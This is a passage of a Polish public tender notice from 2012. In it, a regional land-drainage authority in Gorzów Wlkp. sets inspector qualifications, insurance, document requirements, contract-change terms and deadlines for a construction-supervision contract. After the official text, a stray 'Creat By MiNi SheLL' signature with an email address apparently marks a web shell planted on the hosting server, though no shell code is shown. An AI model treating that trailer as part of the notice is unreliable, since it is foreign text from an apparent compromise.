c) Inspektor nadzoru branży hydrotechnicznej lub wodno-melioracyjnej - musi posiadać  uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie, obejmujące co najmniej kierowanie 	budową lub innymi robotami budowlanymi zgodnie z ustawą z dnia 7 lipca 1994 r Prawo 	budowlane (Dz. U. z 2010r. Nr 243, poz. 1623 z późn. zm) w specjalności konstrukcyjno-budowlanej bez ograniczeń lub uprawnienia w zakresie budowli hydrotechnicznych lub wodno-melioracyjne uzyskane na podstawie wcześniej obowiązujących przepisów. Inspektor  musi wykazać się, iż w przeciągu ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, pełnił funkcję inspektora nadzoru w zakresie swoich uprawnień przynajmniej jednej inwestycji o wartości minimum 3,5 mln zł. brutto lub dwóch inwestycji (jak w dziale V pkt.2), o wartości 7,0 mln zł. brutto łącznie oraz który jest członkiem właściwej okręgowej izby inżynierów budownictwa,

d) Inspektor branży elektrycznej - musi posiadać uprawnienia do kierowania robotami elektrycznymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji w przedmiotowym postępowaniu i być wpisany na listę członków właściwej izby samorządu zawodowego. Inspektor musi wykazać się, iż w przeciągu ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, pełnił funkcję inspektora nadzoru w zakresie swoich uprawnień przynajmniej jednej inwestycji o wartości  minimum 500 tys. zł.  brutto lub dwóch inwestycji o wartości powyżej 1,0 mln.zł. brutto łącznie.

e) Inspektor branży sanitarnej - musi posiadać uprawnienia do kierowania robotami sanitarnymi w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji w przedmiotowym postępowaniu i być wpisany na listę członków właściwej izby samorządu zawodowego. Inspektor  musi wykazać się, iż w przeciągu ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, pełnił funkcję inspektora nadzoru w zakresie swoich uprawnień przynajmniej jednej inwestycji o wartości  minimum 500 tys. zł.  brutto lub dwóch inwestycji o wartości powyżej 1,0 mln.zł. brutto łącznie
 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek może być spełniony łącznie.

Ocena spełnienia w/w warunków dokonana zostanie metodą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. posiadają opłaconą polisę , a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 300.000,-zł.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek może być spełniony łącznie.

Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wykaz części zamówienia, które Wykonawca powierzy podwykonawcy , upoważnienie dla osoby reprezentującej Wykonawcę, o ile to nie wynika z innych 
  dokumentów. W przypadku zawiązania konsorcjum, należy załączyć pełnomocnictwo dla  
   podmiotu reprezentującego kilku wykonawców, pisemne zobowiązanie do współpracy osób lub podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany postanowień umowy wymagają formy pisemnej w postaci aneksu podpisanego przez obie strony pod rygorem nieważności.
2. Dopuszcza się możliwość zmiany wynagrodzenia w przypadku wydłużenia terminu 
    realizacji robót budowlanych (wyznaczony dla Wykonawcy Robót budowlanych) o okres 
    dłuższy niż 3 m-ce. W tym przypadku będzie przysługiwał wzrost wynagrodzenia dla 
    Nadzoru Inwestorskiego liczony za cały okres wydłużenia wykonywania usługi (odpowiednio w tej samej cenie za 1 miesiąc). Miesięczny wzrost wynagrodzenia należy obliczyć jako iloczyn tego okresu i wartości otrzymanej z podzielenia umownego wynagrodzenia na okres wynikający z terminu wykonania przedmiotu umowy, który został określony w  § 3 ust.1.
    Wydłużenie terminu realizacji robót budowlanych (wyznaczony dla Wykonawcy Robót budowlanych) o okres krótszy niż 3 m-ce nie stanowi podstawy do renegocjacji wysokości wynagrodzenia. 
3. Dopuszcza się możliwość zmiany terminu realizacji przedmiotu umowy w przypadku  
    zmiany, zwłoki lub opóźnienia w terminie realizacji robót budowlanych  o okres dłuższy niż 
    3 miesiące.
4. Zamawiający dopuszcza zmianę osób odpowiedzialnych za wykonanie przedmiotu umowy
    pod warunkiem wystąpienia następujących przypadków:
    - zdarzeń losowych (choroby, śmierci ,
    - nie wywiązywanie się osób z obowiązków wynikających z niniejszej umowy,
    - rezygnacja tych osób w formie pisemnej z wykonywania swoich obowiązków.
5. O wystąpieniu okoliczności , które mogą mieć wpływ na zmiany wprowadzane w umowie 
    Nadzór Inwestorski jest zobowiązany najpóźniej w terminie 7 dni od ich wystąpienia,  
    zawiadomić pisemnie zamawiającego.
6. Zmiany umowy będą wymagać formy pisemnego aneksu podpisanego przez obie strony i 
    dopuszczalne będą w granicach unormowań ustawowych, gdy zamawiający przewidział możliwość ich dokonania w dokumentach przetargowych, będących integralną częścią umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://melioracja.lubuskie.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Lubuski Zarząd Melioracji i Urządzeń Wodnych w Zielonej Górze 
           Oddział w Gorzowie Wlkp. 
           ul. Myśliborska 52 , 66-413 Gorzów Wlkp. fax: 95 7285 931.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2012 godzina 10:00, miejsce: Lubuski Zarząd Melioracji i Urządzeń Wodnych  w Gorzowie Wlkp.  ul. Myśliborska 52   66-413 Gorzów Wlkp. pokój 
 nr 2   (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com